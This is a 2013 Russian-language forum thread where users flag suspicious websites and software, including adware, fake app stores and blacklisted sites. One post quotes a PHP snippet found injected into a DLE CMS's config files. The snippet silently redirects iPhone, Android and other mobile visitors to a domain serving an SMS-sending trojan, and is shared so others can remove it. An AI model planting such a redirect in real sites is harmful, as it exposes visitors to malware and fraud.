Подозрительные сайты , обсуждение и окончательная оценка

Post Reply
User avatar
anderjjj
Posts: 491
Joined: Thu Jan 10, 2013 9:03 pm

RE: Подозрительные сайты , обсуждени

Post by anderjjj » Fri Feb 08, 2013 12:19 pm

hххp://www.skymonk.net/


Так званий skymonk-менеджер закачек. Очень подозрительное приложение, скачивает оно то быстро, но выскакивает не понятная и эротического характера реклама..и много другого. Некоторый антивирус распознает как( вредоносная программа)
Трудно удалить данное приложение с ПК!! Не каждый пользователь, а особенно (новичок) сможет это сделать.
На мое мнение, не стоит ставить данную программу.


User avatar
donsorg
Posts: 2023
Joined: Wed Nov 30, 2011 8:42 am

RE: Подозрительные сайты , обсуждени

Post by donsorg » Sat Feb 09, 2013 7:50 am

Боевые бобры - [red]www.bobergame.ru[/red]

(ещё и рефоводы спамят)

8ele8
Posts: 2
Joined: Sat Feb 09, 2013 8:29 am

RE: Подозрительные сайты , обсуждени

Post by 8ele8 » Sat Feb 09, 2013 8:29 am

Мой сайт ( 8ele8.ru ) неожиданно стал подозрительным. Проверка на вирусы показывает, что ничего плохого не обнаружено. Почему так? И что мне делать в этом случае?

User avatar
Fantozzi
Posts: 1860
Joined: Thu Jan 12, 2012 6:30 pm

RE: Подозрительные сайты , обсуждени

Post by Fantozzi » Sat Feb 09, 2013 9:47 am

<quote user="8ele8">
Мой сайт ( 8ele8.ru ) неожиданно стал подозрительным. Проверка на вирусы показывает, что ничего плохого не обнаружено. Почему так? И что мне делать в этом случае?
[/quote]

Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации.
Blacklisted by Yandex Safe Browsing for malware.

8ele8
Posts: 2
Joined: Sat Feb 09, 2013 8:29 am

RE: Подозрительные сайты , обсуждени

Post by 8ele8 » Sat Feb 09, 2013 10:37 am

<quote user="fantozzi">
Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации.
Blacklisted by Yandex Safe Browsing for malware.
[/quote]
Тогда, видно, надо продолжать атаковывать Русоникс, только через них могло что-то просочиться. Спасибо.

User avatar
nacnelizlo
Posts: 39
Joined: Mon Jan 21, 2013 11:19 am

RE: Подозрительный сайт

Post by nacnelizlo » Mon Feb 11, 2013 12:41 am

Если не в ту ветку опубликую, приношу извинения. Вчера, а точнее уже сегодня, столкнулся с такой проблемой как редирект на сайт statuses.ws / mobi-service2.com.
При открытие моего сайта, с полной версии - никаких признаков вирусов и т.п не наблюдалось. Но на почту пошли письма от пользователей, что при входе на сайт с мобильной версии скачивается какае-то программа, после ее запуска она ТРЕБУЕТ отправить смс. Сам того не зная, решил проверить...Да, действительно так и было. Скачивалось якобы "обновление браузера". При запуске оно просило разрешить полные данные. А точнее "Отправку смс". Это меня ввело в ступор, т.к использую лицензионную CMS DLE и как этот вирус попал, уму непостижимо. Начал ползать по всему движку что бы найти и устранить эту проблему, т.к Яндекс и Гугл могут легко ввести сайт в Black list. В итоге, наткнулся на 2 файла где и находился код, который отправляет на этот сайт "statuses.ws". Т.к написал, что пользуюсь CMS DLE, то эти файлы были на этом пути engine/data/config.php u dbconfig.php. Сам код был таковым :
$iphone=strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android=strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre=strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry=strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod=strpos($_SERVER['HTTP_USER_AGENT'],"iPod")
if($iphone||$android||$palmpre||$ipod||$berry===true){
header('Location:http://statuses.ws/ ');
}
Возможно кто-то сталкивался, а кто-то еще и столкнется с такой проблемой. Поэтому сразу удаляйте этот код с этих файлов, т.к сайт с легкостью могут занести в black list.

User avatar
donsorg
Posts: 2023
Joined: Wed Nov 30, 2011 8:42 am

RE: Подозрительный сайт

Post by donsorg » Mon Feb 11, 2013 9:38 am

<quote user="nacnelizlo">
использую лицензионную CMS DLE и как этот вирус попал, уму непостижимо.
Возможно кто-то сталкивался, а кто-то еще и столкнется с такой проблемой. Поэтому сразу удаляйте этот код с этих файлов, т.к сайт с легкостью могут занести в black list.
[/quote]

Лицензионность не защитит продукт от заражения, пока в нем есть уязвимости:
http://www.w9y.ru/dle/bugs/232-novyy-vi ... s-dle.html

Даже если вы сейчас удалили зловредный код, он снова появится - вопрос времени. Нужно устранять саму уязвимость в CMS (видимо обновляясь на последнюю версию и теребя разработчиков, чтобы они скорее фиксили баг).

User avatar
donsorg
Posts: 2023
Joined: Wed Nov 30, 2011 8:42 am

RE: Подозрительные сайты , обсуждени

Post by donsorg » Thu Feb 21, 2013 7:48 pm

[red]
odnoklassniki-test2012.ru - фейковый маркет для андроида?
[/red]

User avatar
donsorg
Posts: 2023
Joined: Wed Nov 30, 2011 8:42 am

RE: Подозрительные сайты , обсуждени

Post by donsorg » Sat Feb 23, 2013 6:49 am

На форуме anti-malware.ru обсуждаются кустарные "антивирусы" со ссылками на их сайты. Рекомендую почитать - весьма интересно: http://www.anti-malware.ru/forum/index. ... opic=25141

[green]anti-malware.ru[/green]

UPD: еще по теме:

1. http://juick.com/Umnik/2249039

User avatar
Fantozzi
Posts: 1860
Joined: Thu Jan 12, 2012 6:30 pm

Тоже полезно оценить:

Post by Fantozzi » Sat Feb 23, 2013 9:55 am

http://en.m.wikipedia.org/wiki/List_of_ ... y_software

http://support.kaspersky.com/viruses/rogue

Post Reply

Who is online

Users browsing this forum: No registered users and 3 guests